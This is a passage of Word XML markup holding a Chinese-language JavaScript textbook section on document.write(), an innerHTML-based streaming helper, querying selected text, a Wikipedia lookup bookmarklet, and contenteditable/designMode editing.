      <w:r>
        <w:t>方法在其他的窗口或框架页中来创建整个全新文档。（但是，当有多个窗口或框架页时，必须注意不要违反同源策略。）第一次调用其</w:t>
      </w:r>
      <w:r>
        <w:t>他文档的</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法即会擦除该文档的所有内容。可以多次调用</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>来逐步建立新文档的内容。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>的内容可能缓存起来（并且不会显示）直到调用文档对象的</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来结束该写序列。本质上这告诉</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>解析器文档已经达到了文件的末尾，应该结束解析并显示新文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>值得一提的是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象还支持</w:t>
      </w:r>
      <w:r>
        <w:t>writeln()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，除了在其参数的输出之后追加一个换行符以外它和</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法完全一样。例如，在＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素内输出预格式化的文本时这非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在当今的代码中</w:t>
      </w:r>
      <w:r>
        <w:t>document.</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并不常用：</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性和其他</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>技术提供了更好的方法来为文档增加内容。另一方面，某些算法的确使得它们本身成为很好的流式</w:t>
      </w:r>
      <w:r>
        <w:t>I/O API</w:t>
      </w:r>
      <w:r>
        <w:t>，如同</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法提供的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>一样。如果你正在书写在运行时计算和输出文本的代码，可能会对例</w:t>
      </w:r>
      <w:r>
        <w:t>15-10</w:t>
      </w:r>
      <w:r>
        <w:t>感兴趣，它利用指定元素的</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性包装了简单的</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>15-10</w:t>
      </w:r>
      <w:r>
        <w:t>：针对</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的流式</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为设置元素的</w:t>
      </w:r>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t>定义简单的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>流式</w:t>
      </w:r>
      <w:r>
        <w:t>"API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function Element</w:t>
      </w:r>
      <w:r>
        <w:t>Stream(elt){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof elt==="string")elt=document.getElementById(elt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.elt=elt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.buffer="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>连接所有的参数，添加到缓存中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ElementStream.prototype.write=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.buffer+=Array.prototype.join.call(arguments,"");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>，只是多增加了换行符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ElementStream.p</w:t>
      </w:r>
      <w:r>
        <w:t>rototype.writeln=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.buffer+=Array.prototype.join.call(arguments,"")+"\n";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>从缓存设置元素的内容，然后清空缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ElementStream.prototype.close=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.elt.innerHTML=this.buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.buffer="";</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396" w:name="15_10_3_Cha_Xun_Xuan_Qu_De_Wen_Ben_"/>
      <w:r>
        <w:t>15.10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　查询选取的文本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="396"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时判定用户在文档中选取了哪些文本非常有用。可以用类似如下的函数达到目的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getSelectedText(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(window.getSelection)//HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return window.getSelection().toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(document.selection)//IE</w:t>
      </w:r>
      <w:r>
        <w:t>特有的技术</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return document.selection.createRange().text;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标准的</w:t>
      </w:r>
      <w:r>
        <w:t>window.getSelection()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Selection</w:t>
      </w:r>
      <w:r>
        <w:t>对象，后者描述了当前选取的一系列一个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Selection</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个不太常用的较为复杂的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，本书中并没有文档记录。</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>Selection</w:t>
      </w:r>
      <w:r>
        <w:t>对象中最重要的也广泛实现了（除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>）的特性，它返回选取的纯文本内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个不同的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，它在本书中也没有文档记录。</w:t>
      </w:r>
      <w:r>
        <w:t>document.selection</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表了用户的选择。该对象的</w:t>
      </w:r>
      <w:r>
        <w:t>createRange()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>特有的</w:t>
      </w:r>
      <w:r>
        <w:t>TextRange</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它的</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含了选取的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如上的代码在书签工具（见</w:t>
      </w:r>
      <w:r>
        <w:t>13.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节）中特别有用，它操作选取的文本，然后利用搜索引擎或参考站点查找某个单词。例如，如下</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>链接在</w:t>
      </w:r>
      <w:r>
        <w:t>Wikipedia</w:t>
      </w:r>
      <w:r>
        <w:t>上查找当前选取的文本。收藏书签后，该链接和它包含的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript URL</w:t>
      </w:r>
      <w:r>
        <w:t>就变成了一个书签工具：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href="javascript:var q;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(window.getSelection)q=window.getSelection().toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(document.selection)q=document.sel</w:t>
      </w:r>
      <w:r>
        <w:t>ection.createRange().text;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>void window.open('http://en.wikipedia.org/wiki/'+q);"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Look Up Selected Text In Wikipedia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述展示的查询选取代码的兼容性不佳：</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>getSelection()</w:t>
      </w:r>
      <w:r>
        <w:t>方法无法返回那些表单元素＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞内部选中的文本，它只返回在文档主体本身中选取的文本。另一方面，</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>document.selection</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以返回文档中任意地方选取的文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从文本输入域或＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中获取选取的文本可使用以下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.value.substring(elt.selectionStart,elt.selectionEnd);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IE </w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>以及更早版本的浏览器不支持</w:t>
      </w:r>
      <w:r>
        <w:t>selectionStart</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>selectionEnd</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="15_10_4_Ke_Bian_Ji_De_Nei_Rong_"/>
      <w:r>
        <w:t>15.10.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　可编辑的内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经知道</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素包含了文本字段和文本域元素，用户可以输入并编辑纯文本。跟随</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的脚步，所有当今的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器也支持简单的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>编辑功能：你也许已经看到过这在页面上使用了（如博客评论页），它嵌入了一个富文本编辑器，包含了一个有一系列按钮的工具栏来设置排版样式（粗体、斜体）、对齐和插入图片与链接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有两种方法来启用编辑功能。其一，设置任何标签的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML contenteditab</w:t>
      </w:r>
      <w:r>
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:t>属性；其二，设置对应元素的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript contenteditable</w:t>
      </w:r>
      <w:r>
        <w:t>属性；这都将使得元素的内容变成可编辑。当用户单击该元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素的内容时就会出现插入光标，用户敲击键盘就可以插入其中。如以下代码，一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素创建了一个可编辑的区域：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id="editor"contenteditable</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Click to edit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器可能为表单字段和</w:t>
      </w:r>
      <w:r>
        <w:t>contenteditable</w:t>
      </w:r>
      <w:r>
        <w:t>元素支持自动拼写检查。在支持该功能的浏览器中，检查可能默认开启或关闭。为元素添加</w:t>
      </w:r>
      <w:r>
        <w:t>spellcheck</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>来显式开启拼写检查，而使用</w:t>
      </w:r>
      <w:r>
        <w:t>spellcheck=false</w:t>
      </w:r>
      <w:r>
        <w:t>来显式关闭该功能（例如，当一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞将显示源代码或其他内容包含了字典里找不到的标识符时）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>designMode</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>使得整个文档可编辑。（设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"off"</w:t>
      </w:r>
      <w:r>
        <w:t>将恢复为只读文档。）</w:t>
      </w:r>
      <w:r>
        <w:t>designMode</w:t>
      </w:r>
      <w:r>
        <w:t>属性并没有对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如下代码使得＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞内部的文档可编辑（注意，这里用了例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>函数）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe id="editor"src="about:blank</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>空</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onLoad(function(){//document</w:t>
      </w:r>
      <w:r>
        <w:t>加载后，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var editor=document.getElementById("editor");//</w:t>
      </w:r>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>中的文档对象，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>editor.contentDocument.designMode="on";//</w:t>
      </w:r>
      <w:r>
        <w:t>开启编辑</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</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所有当今的浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>contenteditable</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>designMode</w:t>
      </w:r>
      <w:r>
        <w:t>属性。但是，当谈到它们实际的可编辑行为时，它们是不太兼容的。所有</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器都允许插入与删除文本并用鼠标与键盘移动光标。在所有的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:t>键另起一行，但不同的浏览器生成了不同的标记。有些开始了新的段落，而其他的只是插入一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有些浏览器允许键盘快捷键（如</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl+B</w:t>
      </w:r>
      <w:r>
        <w:t>）来加粗当前选中的文本。在其他浏览器（如</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>）中，标准的字处理快捷键（如</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl+B</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl+I</w:t>
      </w:r>
      <w:r>
        <w:t>）被绑定到浏览器相关的其他功能上了而无法应用到文本编辑器上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器定义了多项文本编辑命令，大部分没有键盘快捷键。为了执行这些命令，应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
